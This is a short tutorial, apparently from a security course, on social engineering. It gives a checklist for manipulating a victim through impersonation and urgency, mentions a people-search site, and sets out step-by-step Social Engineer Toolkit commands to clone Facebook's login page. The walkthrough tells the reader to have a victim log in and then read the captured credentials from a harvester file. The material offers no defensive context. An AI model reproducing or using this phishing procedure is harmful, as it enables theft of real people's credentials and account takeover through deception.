Humans are the weakest link in any system. And exploiting them by treating them as an initial attack vector is called as Social Engineering. Much of the information can be found out by performing this technique. Social engineering is the art of extracting the useful information using social skills or communication skills.

The acts like dumpster diving, shoulder surfing, email spamming, sending fake emails and email bombing are also involved in the Social engineering. It can be done better on the phone than meeting personally. The steps to be followed while Social engineering can be listed as:

• Choose a victim

• Impersonate high in position

• Expression of urgency

• Persuade victim for help

• Thank or appreciate profusely

Social Engineer Toolkit, also known as SET or SEToolkit is the most advance open source software that is designed to perform attacks against the weakest entity in the system i.e. humans. It comes integrated within Kali Linux to perform the social engineering attacks like phishing. Also information about people can also be harvested using their virtual social life. Websites like www.pipl.com can found out much information about people using their activeness in the social networking sites.

Deliverables:

In Kali Linux --> Terminal

~# setoolkit (Enter)

~# y (Enter)

Select (1) Social Engineering Attack

~# 1 (Enter)

Select (2) Website Attack Vectors

~# 2 (Enter)

Select (3) Credential Harvester Attack Method

~# 3 (Enter)

Select (2) Site Cloner

~# 2 (Enter)

Enter IP address for the post back. Put your (attacker’s i.e. Kali Linux’s) IP address

~# [Kali Linux IP address] (Enter)

Enter the URL to clone

Ex. ~# www.facebook.com (Enter)

Now open that IP address in victim’s browser and put id and password and login.

Those Id and passwords can be seen in the /var/www/harvester.txt file in Kali Linux.